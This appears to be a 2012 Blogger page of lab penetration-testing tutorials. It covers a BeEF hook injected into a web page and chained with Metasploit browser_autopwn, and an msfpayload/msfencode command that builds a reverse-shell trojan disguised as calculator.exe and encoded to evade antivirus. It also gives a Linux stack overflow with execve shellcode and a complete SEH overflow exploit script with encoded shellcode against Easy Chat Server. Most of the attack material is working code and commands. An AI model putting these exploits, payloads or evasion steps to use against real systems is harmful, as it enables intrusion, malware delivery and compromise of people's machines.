This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Wednesday, February 29, 2012

Combining Beef and Metasploit Framework

In last tutorial we practice using metasploit for exploiting the target and modify the webpage in target OS while inject it with beef code. Now, we will using web page injected with beef code. Then, we activate metasploit framework using meterpreter payload and keep it in listening process. So, when the target access our web page, we can exploit it using meterpreter.

Now, let's practice it.

First, try to make webpage included with beef code. To do that we just need to add this code '<script type="text/javascript" src="http://192.168.56.1:3000/hook.js"> </script>' after <body> code.


Now, open beef, and access http://127.0.1.1:3000/ui/panel in our browser, login with username and password : beef.

Then, assume target access our web.


Let's see in the beef UI panel, there IP address 192.168.56.101 with Mozilla Firefox icon. It means that our target is accessing our web using Mozilla Frefox browser.

 Now, open Metasploit Framework then use auxiliary/server/browser_autopwn and set LHOST and PAYLOAD.




We can see that there are listening process. When http://192.168.56.1:8080/q5Ou9BjYrH is opened, we can exploit the target.

So, we will redirect the target into that address by using Raw Java Script in The Command Tab - Misc, then write javascript code for redirect process "window.location = 'http://192.168.56.1:8080/q5Ou9BjYrH'"




We can see that we have done it...






Monday, February 27, 2012

Using Auxilary in Metasploit for Port Scanning

We will use an Auxilary in Metasploit for Port Scanning



Using Metasploit and Beef Framework

In this article we will combine to use metasploit framework for entering the target, then modify the website code (in this case xampp, file spash.php) can access hook.js when it is loaded. So when target access this website, we can control with beef framework.

Now, let's scan the target


Next, let's see the content of target OS using metasploit framework





Ok, we assume that we have create a malware as in article "Using MsfPayload and MsfEncode". So, we can download splash.php, download it, alter the code, and upload it into the curren location. So, we the target access http://localhost/xampp, we can exploit it using beef framework.












Using msfpayload and msfencode

In this article we use msfpayload combining with msfencode for generate executable malware will be sent into target system. Before we start, let's we know about them.

Msfpayloads is a tool in Metasploit Framework to generate executable malware based on avaiable payloads.

Msfencode is one of tools in Metasploit Framework used to encode payloads to pass virus scanners protection so we can ensure our payloads is executed by target system. Because, in many cases, basic payloads or exploits can be detected as virus.

Next, we will use calculator application that will be crafted with payload and encoded with msfencode.

Let's create executable malware.

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.1 R | msfencode -t exe -e x86/shikata_ga_nai -x /tmp/calc.exe -k -o calculator.exe -c 5

We have created calculator.exe as payloads

 Now, let's upload it into target. We need scan the target first
 We have known target using warfrtd application
 Let's exploit it with metasploit

We will use meterpreter payload to upload calculator.exe
 We have uploaded it
 Now, when target run calculator.exe, we can exploit it.










Social Engineering and SET

Social engineering  is   art of manipulating people into performing actions or divulging confidential information. While it is similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victims.

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test. 

Friday, February 24, 2012

Stack Based Exploitation in Linux



1. Turn off ASLR
root@bt:~# cat /proc/sys/kernel/randomize_va_space 
root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space

root@bt:~# cat /proc/sys/kernel/randomize_va_space

0

 

2. Creating program that will be exploit

#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buffer[500];
strcpy(buffer, argv[1]); // Vulnerable function!
return 0;
}

Save it with vulnerable_1.c

3. Compile vulnerable_1.c with gcc, then debug it with gdb
root@bt:~# gcc -ggdb -o vulnerable_1 vulnerable_1.c
root@bt:~# gdb vulnerable_1


gcc 3.x and gcc 4.x use SSP (Stack Smashing Protector) used to detect a stack buffer overflow before any malicious code is executed.

We can turn off it by using “-fno-stack-protector” flag when compiling.

4. Compile again vulnerable_1.c with gcc with “-fno-stack-protector”, then debug it with gdb

root@bt:~# gcc -ggdb -o vulnerable_1 -fno-stack-protector -mpreferred-stack-boundary=2 vulnerable_1.c
root@bt:~# gdb vulnerable_1



Ok. we have overwrite EIP succesfully

5. Now, let's see more information about register EIP



6.  Let's breakpoin in line 8 : strcpy(buffer, argv[1]);   to know ESP address



let’s try to find out the ESP address and subtract 100 bytes from it.

If we subtract 100 bytes from ESP, we will get 0xbffff16c - 100 = 0xbffff06c


7. Creating shellcode


















8. Creating fuzzer with shellcode

$(python -c 'print "\x90"*323+ "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x6c\xf0\xff\xbf"*35')

323 + 45 (number of bytes of shellcode) = 368 bytes
508 (number required to overwrite EIP)  - 368 = 140

140 / 4 (Because EIP address is 4 bytes) = 35

 
Run it



Wednesday, February 22, 2012

SEH Stack Based Overflow in Easy Chat Application




First start Easy Chat Server

In the client we can access easy chat by using browser type the IP of Easy Chat Server : 192.168.56.101
Then try to enter the room chat by typing username and password
username : admin
password : admin

Now, we have entered chat room

To know process happen, we use wireshack capturing process happening in the network. Start wireshack, then choose the device (because we use Windows in Virtual Box for our server, we use vbnet0.).

We can see that username and password have been sent using GET method. To know more detail process, right click in the process row do you want to know further, then click “Follow TCP Stream” and we can see how username and password sent.

We can use it in our fuzzer to sent many characters causing the application crash. Now let's create the fuzzer

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = "192.168.56.101"
tport = 80
buffer = "\x41" * 20000
getsend ="GET /body.ghp?username="+buffer+"&password="+buffer+"&room=4 HTTP/1.1\r\n\""
getsend+="Host:192.168.56.101"
getsend += "\r\n\r\n"
s.connect((ipaddr,tport))
s.send(getsend)
s.close()

Save it with easychat.py, then run it by typing python easychat.py
But the application still running normarly. So, we have to change the fuzzer. Let's try to send username and password via chat.ghp. We can knoe it via address bar in the browser when entering the room.

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = "192.168.56.101"
tport = 80
buffer = "\x41" * 20000
getsend ="GET /body.ghp?username="+buffer+"&password="+buffer+"&room=4 HTTP/1.1\r\n\""
getsend+="Host:192.168.56.101"
getsend += "\r\n\r\n"
s.connect((ipaddr,tport))
s.send(getsend)
s.close()

Save it with easychat.py, then run it by typing python easychat.py
But the application still running normarly. So, we have to change the fuzzer. Let's try to send username and password via chat.ghp. We can know it via address bar in the browser when entering the room.

So, the fuzzer become

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = "192.168.56.101"
tport = 80
buffer = "\x41" * 20000
getsend ="GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=4 HTTP/1.1\r\n\""
getsend+="Host:192.168.56.101"
getsend += "\r\n\r\n"
s.connect((ipaddr,tport))
s.send(getsend)
s.close()

Ok, we are success to make it chash. Let's analyze it with ollydbg




From the Ollydbg, we knoe that we can overwrite SEH. Now let's analyze in which number of characters SEH is overwritten.
Type : # /pentest/exploits/framework/tools/pattern_create.rb 20000
Then copy the string generated to fuzzer...

/pentest/exploits/framework/tools/pattern_offset.rb 68413368

Now, change the fuzzer to make sure we can overwrite EIP

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = "192.168.56.101"
tport = 80
buffer = "\x41" * 216
buffer += "\xCC\xCC\xCC\xCC" 
buffer += "\xEF\xBE\xAD\xDE"
buffer += "\x41" * (20000 - len(buffer))
getsend ="GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=4 HTTP/1.1\r\n\""
getsend+="Host:192.168.56.101"
getsend += "\r\n\r\n"
s.connect((ipaddr,tport))
s.send(getsend)
s.close()

Let's try it


Ok, now, we can overwrite EIP successfully
Next let's search the address not containing SafeSEH and DllCharacteristic.
After analyzing application modules one by one, we have found that SSLEAY32.dll is free from them.
Now, let's search POP POP RETN address. Click at the dll, ctrl+S. write POP r32 POP r32 RETN

Click Find, we can see the POP POP RETN address
Now, let's change the fuzzer

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = "192.168.56.101"
tport = 80
buffer = "\x41" * 216
buffer += "\xCC\xCC\xCC\xCC" 
buffer += "\xBA\x22\x00\x10"
buffer += "\x41" * (20000 - len(buffer))
getsend ="GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=4 HTTP/1.1\r\n\""
getsend+="Host:192.168.56.101"
getsend += "\r\n\r\n"
s.connect((ipaddr,tport))
s.send(getsend)
s.close()

Run the fuzzer..
But nothing happen. I suggest because it contain character "00" - "\x00". Bow let's scroll the module adress after we pass address 1000xxxx

Then search POP POP RET address

Let's change the fuzzer

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = "192.168.56.101"
tport = 80
buffer = "\x41" * 216
buffer += "\xCC\xCC\xCC\xCC" 
buffer += "\x66\x89\x01\x10"
buffer += "\x41" * (20000 - len(buffer))
getsend ="GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=4 HTTP/1.1\r\n\""
getsend+="Host:192.168.56.101"
getsend += "\r\n\r\n"
s.connect((ipaddr,tport))
s.send(getsend)
s.close()

Let's try it again
Ok, we can use address to overwrite EIP, then analyzing the space to save shellcode
To do that right-click 013E6DDC - Follow in Dump - Selection
We have big enough memory address 013E6DE4 s.d. 013EF33C
Next, let's create payload.

Let' change fuzzer into
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = "192.168.56.101"
tport = 80
buffer = "\x90" * 216
buffer += "\xEB\x06\x90\x90"
buffer += "\x99\x88\x01\x10"
buffer += "\x90" * 16
buffer += ("\xda\xc3\xbe\x34\x1d\x0e\x80\x2b\xc9\xb1\x51\xd9\x74\x24\xf4\x5b"
"\x31\x73\x17\x03\x73\x17\x83\xf7\x19\xec\x75\x0b\x4b\x1b\x38\x1b"
"\x75\x24\x3c\x24\xe6\x50\xaf\xfe\xc3\xed\x75\xc2\x80\x8e\x70\x42"
"\x96\x81\xf0\xfd\x80\xd6\x58\x21\xb0\x03\x2f\xaa\x86\x58\xb1\x42"
"\xd7\x9e\x2b\x36\x9c\xdf\x38\x41\x5c\x15\xcd\x4c\x9c\x41\x3a\x75"
"\x74\xb2\xeb\xfc\x91\x31\xb4\xda\x58\xad\x2d\xa9\x57\x7a\x39\xf2"
"\x7b\x7d\xd6\x0f\xa8\xf6\xa1\x63\x94\x14\xd3\xb8\xe5\xff\x77\xb5"
"\x45\x30\xf3\x89\x45\xbb\x73\x15\xfb\x30\x33\x2d\x5d\x2f\x3a\x63"
"\x6f\x43\x12\x84\xb9\xfd\xc0\x1c\x2e\x31\xd5\x88\xd9\x46\x2b\x17"
"\x72\x56\x9b\xcf\xb1\x45\xe0\x34\x16\x69\xcf\x15\x1f\x70\x96\x28"
"\xf2\x73\x55\x7f\x67\x86\xa6\xaf\x1f\x5f\x51\xba\x4d\x08\x9d\x92"
"\xdd\xe4\x32\x49\xb1\x49\xe6\x2e\x66\xb1\xd8\xd6\xe0\x5c\x85\x70"
"\xa2\xd7\xd4\xe9\x2c\x4c\x0c\x61\x6a\xdb\xce\x57\x1e\xf4\x61\x02"
"\x20\x24\xe9\x08\x73\xeb\x03\x07\x73\x22\x80\xf2\x74\x1b\x4f\x19"
"\xc3\x1a\xd9\xb6\x2b\xf4\x8a\x6c\x80\xac\xd5\x5c\xbb\x27\xcd\x25"
"\x7a\xce\x46\x2a\x54\x64\x96\x04\x3f\xed\x0c\xc2\xa8\x92\xa1\x83"
"\xcc\x3f\x6a\xca\x27\x0c\x03\x0b\x5d\xc8\x9d\x31\x93\x10\x6e\x1f"
"\x2a\xd2\xbc\xa1\x91\xff\x2d\xd0\x6c\x38\xf9\x41\x3b\x50\x8f\x6b"
"\x8f\xb7\x90\xe6\xb4\x48\xb8\x53\x62\xe5\x14\x32\xdd\x63\x96\xe5"
"\x8c\x26\xc9\xfa\xff\xa1\x44\xdd\x05\xfc\xc4\x22\xd3\x6a\x14\x23"
"\xeb\x95\x3a\x50\x43\x96\x38\xa2\x08\x99\xe9\x78\x2e\xb5\x7e\x02"
"\x08\xd4\x0c\xa9\x57\xcf\x0c\x9d")
buffer += "\x90" * (20000 - len(buffer))
getsend ="GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=4 HTTP/1.1\r\n\""
getsend+="Host:192.168.56.101"
getsend += "\r\n\r\n"
s.connect((ipaddr,tport))
s.send(getsend)
s.close()


Run it